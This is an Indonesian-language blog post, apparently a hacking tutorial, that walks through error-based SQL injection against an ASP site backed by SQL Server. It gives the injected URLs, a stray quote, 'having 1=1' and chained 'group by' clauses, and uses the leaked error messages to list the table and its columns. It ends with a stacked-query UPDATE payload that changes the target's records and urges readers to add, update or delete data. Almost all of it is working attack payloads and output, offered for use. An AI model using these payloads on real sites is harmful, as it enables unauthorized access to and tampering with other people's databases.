It's About Xadpritox
SQL Injection Pada ASP 1
Saya akan menunjukkan sql injection yang ditemukan oleh david Litcfield. berikut contohnya :
misal alamat target adalah http://[target.com]/Products.asp?CategoryId=55
lalu kita kasih tanda kutip satu, di belakang. jadi alamat webnya adalah
http://[target.com]/Products.asp?CategoryId=55′
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Unclosed quotation mark before the character string ”.
/Product_Des.asp, line 11
tuh, kan keliatan errornya tuh. he he he…
nah, sekarang tinggal cari tablenya, pake metode dari david Litcfield ini, caranya adalah dengan menambahkan having 1=1
berikut contohnya :
http://[target.com]/Products.asp?CategoryId=55+having+1=1
nah, kan keliatan errornya tuh, errornya begini
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘ProductTbl.ProductImage’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/Product_Des.asp, line 11
itu artinya, alamat web tersebut menggunakan tabel dengan nama ProductTbl dan field pertamanya adalah ProductImage
oke, sekarang kita cari field selanjutnya, caranya dengan menggunakan group by
berikut contohnya
http://[target.com]/Products.asp?CategoryId=55+group+by+ProductTbl.ProductImage+having+1=1
maka error yang akan keluar adalah :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘ProductTbl.ProductDescription’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Product_Des.asp, line 11
nah, kita bisa lihat. ternyata field selanjutnya adalah ProductDescription
mari kita cari field selanjutnya,
http://[target.com]/Products.asp?CategoryId=55+group+by+ProductTbl.ProductImage,ProductTbl.ProductDescription+having 1=1
maka errornya adalah:
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘ProductTbl.ProductName’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Product_Des.asp, line 11
oke, kita cari lagi field selanjutnya dengan memasukkan field yang barusan kita ketemukan.
hasilnya adalah :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘ProductTbl.CategoryID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Product_Des.asp, line 11
oke sekarang kita lanjut lagi dengan memasukkan field yang kita ketemukan tadi.
http://[target.com]/Products.asp?CategoryId=55+group+by+ProductTbl.ProductImage,ProductTbl.ProductDescription,ProductTbl.ProductName,ProductTbl.CategoryID+having 1=1
ternyata tidak ada error lagi, artinya fieldnya sudah lengkap.
sekarang saatnya melakukan aksi
untuk melakukan aksi, silahkan gunakan perintah perintah sql biasa, misalkan add, update, delete dll deh. ngerti kan ?
oke, ini saya berikan contoh
http://[target.com]/Products.asp?CategoryId=55;update+ProductTbl+set+ProductDescription=’Anything’+where+productID=33;
lihat sendiri hasilnya
Semoga bermanfaat.